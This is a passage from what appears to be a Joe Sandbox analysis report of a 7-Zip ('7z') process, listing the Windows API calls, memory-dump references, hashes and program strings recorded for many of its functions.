                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: e68d130b3fbb35af545f780041415d27bdcc1d4962bee201badec33138247e70
                                                                                                                                        • Instruction ID: 4a73435ad26dda7809e2ccefc9c5892721ca597c53dfe2ac4e7abc3b4677467a
                                                                                                                                        • Opcode Fuzzy Hash: e68d130b3fbb35af545f780041415d27bdcc1d4962bee201badec33138247e70
                                                                                                                                        • Instruction Fuzzy Hash: DF21BF22721A8586DA18EF57EA806297364F784BE4B488135EF2D0BB96DF34D876C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                        • Instruction ID: 2296b961df0e71e292fe614471d104811e438fecf89ac1eeacd018f2821f8dd8
                                                                                                                                        • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                        • Instruction Fuzzy Hash: F91106A632674181FF489F2AD8693A82255DB09FD4F958020CE0957346FF74CD65C304
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00243C2A
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00243C36
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00243C54
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00243C80
                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00243C9E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2296236218-0
                                                                                                                                        • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                        • Instruction ID: 738cee76369480d4a9af94f2fbed2515b8742d4f11f6042115d25c7e87f3f5f1
                                                                                                                                        • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                        • Instruction Fuzzy Hash: B421D2B6301B4586DB24DF16E85435DB7A0FB88F88F548125DA4C43724EF38C859CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                        • Instruction ID: d6a69aa7da559bef0bad9c097ac3615efe9b4d6f7298e053bb27e84e8a19ca8b
                                                                                                                                        • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                        • Instruction Fuzzy Hash: 6401C023722984D6DA28EF22D81056D3320FB82FA4B584321BF2D17795CF24C8B68700
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 00263877
                                                                                                                                          • Part of subcall function 00260BBC: free.MSVCRT ref: 00260BCC
                                                                                                                                          • Part of subcall function 00260BBC: free.MSVCRT ref: 00260BD5
                                                                                                                                          • Part of subcall function 00260BBC: free.MSVCRT ref: 00260C00
                                                                                                                                          • Part of subcall function 00260BBC: free.MSVCRT ref: 00260C08
                                                                                                                                          • Part of subcall function 00261474: free.MSVCRT ref: 002614A6
                                                                                                                                          • Part of subcall function 00261474: free.MSVCRT ref: 002614AF
                                                                                                                                          • Part of subcall function 00261474: free.MSVCRT ref: 002614B8
                                                                                                                                          • Part of subcall function 00261474: free.MSVCRT ref: 002614C0
                                                                                                                                        • free.MSVCRT ref: 00263892
                                                                                                                                        • free.MSVCRT ref: 0026389B
                                                                                                                                        • free.MSVCRT ref: 002638C6
                                                                                                                                        • free.MSVCRT ref: 002638CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                        • Instruction ID: 61c18f593a35715c236f19b0cc2fce4e6c728e93100b6499932eb9052f5a59bf
                                                                                                                                        • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                        • Instruction Fuzzy Hash: AAF06D23B2289096CA19EE27DD911AC2364BF85F947484161BF1D4B752DF50C9F68740
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                        • Instruction ID: 9848fd712f10c06e61db80801610b46371286d9690bee6ae51bd286ec9e2afac
                                                                                                                                        • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                        • Instruction Fuzzy Hash: 9CF06D137219D4C98B24FE67DD911682368AF96BA876C0171BF1E47756EE20CCE68740
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                        • Instruction ID: 0b6f65a9eed1672ebc3d17c72f30ca4d7417b304f82aee2bf2242edf49bfa1c8
                                                                                                                                        • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                        • Instruction Fuzzy Hash: 74F09053B219C4CECB18FE67DC812682368AF55BA9B9C4171BF2D07756DE20CCE68740
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                        • Instruction ID: 19754990f0eaeff9a8c56c4efc55fb9f1797bfc765c9b44fe5f4f4994811cfca
                                                                                                                                        • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                        • Instruction Fuzzy Hash: FDF09023731884C9CB29AE37DC511282364EFD6FD57590161BF2D0B39ADE30C8AA8740
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 002876AF
                                                                                                                                        • free.MSVCRT ref: 002876BB
                                                                                                                                        • free.MSVCRT ref: 002876C7
                                                                                                                                        • free.MSVCRT ref: 002876D3
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B335
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B342
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B34E
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B358
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B362
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B36C
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B376
                                                                                                                                          • Part of subcall function 0028B310: free.MSVCRT ref: 0028B380
                                                                                                                                        • free.MSVCRT ref: 002876E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                        • Instruction ID: 418fd47867c86f92216c05715ecdbffd18ef54b39b4117edbf13630909ee4fbe
                                                                                                                                        • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                        • Instruction Fuzzy Hash: D7E0C932221980C1CB55FF36C8951EC23A4EB99B58F580171BA2E8E3A2DE10C9A78B50
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrow$memmove
                                                                                                                                        • String ID: Internal collision in update action set
                                                                                                                                        • API String ID: 265668421-2378581463
                                                                                                                                        • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                        • Instruction ID: ec0f12995ca04fd3e9089c151eece4883aa4bf3e6e8f83d11383521c3472e578
                                                                                                                                        • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                        • Instruction Fuzzy Hash: 3541363A32A6858ADB64EF19E48476E7750F78978CF048115EF8903B98DB78D569CB00
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 00276E91
                                                                                                                                          • Part of subcall function 00243518: free.MSVCRT ref: 00243551
                                                                                                                                          • Part of subcall function 00243314: memmove.MSVCRT ref: 00243339
                                                                                                                                        • free.MSVCRT ref: 00276E83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID: exe
                                                                                                                                        • API String ID: 1534225298-1801697008
                                                                                                                                        • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                        • Instruction ID: db03a5c78fbb9fd80f1d1fd220c3b9770b0d057f5aff914931f252308a6f89f5
                                                                                                                                        • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                        • Instruction Fuzzy Hash: 3431612332494196CE34EF25E84119EBB31E7857D4F845212EB9E4766ADF38C69ACF00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ByteStringmemmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 400576877-0
                                                                                                                                        • Opcode ID: cd1f0a1bc293753069785a543be91f5ebdc2214bde0953bac565bf328565b0da
                                                                                                                                        • Instruction ID: 9647e426986685f91aa0b1f09466605d90036f2286ddccabe3c312665d71a3ac
                                                                                                                                        • Opcode Fuzzy Hash: cd1f0a1bc293753069785a543be91f5ebdc2214bde0953bac565bf328565b0da
                                                                                                                                        • Instruction Fuzzy Hash: F421B52332578192EB249F52E5503696268FB887E4F484125EFAE4B794DF78C8F6C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$wcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4021281200-0
                                                                                                                                        • Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                        • Instruction ID: 05c2934256d0a208ecd88cee31e131eb6c0ec28587cbe2f135a102ae9cfcac7a
                                                                                                                                        • Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                        • Instruction Fuzzy Hash: 1021F57633478082DB21EF26E440269B368EBC5BE4F545221EE6E47794EF74C5D6CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: Unsupported charset:
                                                                                                                                        • API String ID: 1294909896-616772432
                                                                                                                                        • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                        • Instruction ID: 4d8be3bda900d3ee0cb496d6d64137603fa41b6b382cfbe2717d2b9462f533e7
                                                                                                                                        • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                        • Instruction Fuzzy Hash: 3C21D66362464092DB24DF18D99039D7720E7C93E8F940222FBAD077B5CF68C99ACB40
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00247D4C: GetFileAttributesW.KERNELBASE ref: 00247D6E
                                                                                                                                          • Part of subcall function 00247D4C: GetFileAttributesW.KERNEL32 ref: 00247DA5
                                                                                                                                          • Part of subcall function 00247D4C: free.MSVCRT ref: 00247DB2
                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00246D90
                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00246DCA
                                                                                                                                        • free.MSVCRT ref: 00246DDA
                                                                                                                                        • free.MSVCRT ref: 00246DE8
                                                                                                                                          • Part of subcall function 002468A0: SetFileAttributesW.KERNELBASE ref: 002468C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Attributesfree$Delete
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 324319583-0
                                                                                                                                        • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                        • Instruction ID: 2d3ddba1cebb5d7ad7af86f34782fcd94ffabfd573c2ebd7b2cacdea97cb6405
                                                                                                                                        • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                        • Instruction Fuzzy Hash: 3A018826B64A01C1CA3CAF25DC5936953205FC77B4F581361AD6E873E9DE24C97ACB02
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 00252137
                                                                                                                                        • free.MSVCRT ref: 002521BB
                                                                                                                                          • Part of subcall function 00246618: FormatMessageW.KERNEL32 ref: 00246676
                                                                                                                                          • Part of subcall function 00246618: LocalFree.KERNEL32 ref: 00246698
                                                                                                                                          • Part of subcall function 0024362C: memmove.MSVCRT ref: 00243659
                                                                                                                                        • free.MSVCRT ref: 00252182
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                        • String ID: :
                                                                                                                                        • API String ID: 1743135865-3653984579
                                                                                                                                        • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                        • Instruction ID: 16ad9cfe906d4c68bb0f7189b5858ea478864f0188f4e092eb88ced2477ac4e2
                                                                                                                                        • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                        • Instruction Fuzzy Hash: 8001E913300D0090CA20EF25E88429E6721EBC5BF4F954321BE5E477B9DE28CA86CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244327787-0
                                                                                                                                        • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                        • Instruction ID: 8da8e68d2c548ec64531e75f766c0bc8f381220e31b8926047555d4a6d3f218c
                                                                                                                                        • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                        • Instruction Fuzzy Hash: F001F7227320619BD7625F3D9D083696394B708BE2FA04131FE4ACBB50DA28CC418B80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs
                                                                                                                                        • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                        • API String ID: 1795875747-932691680
                                                                                                                                        • Opcode ID: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                        • Instruction ID: 7aff51220cba3672cf6431ed44902ade96fe2bb54e9a4b61bbd49d06cb7b1538
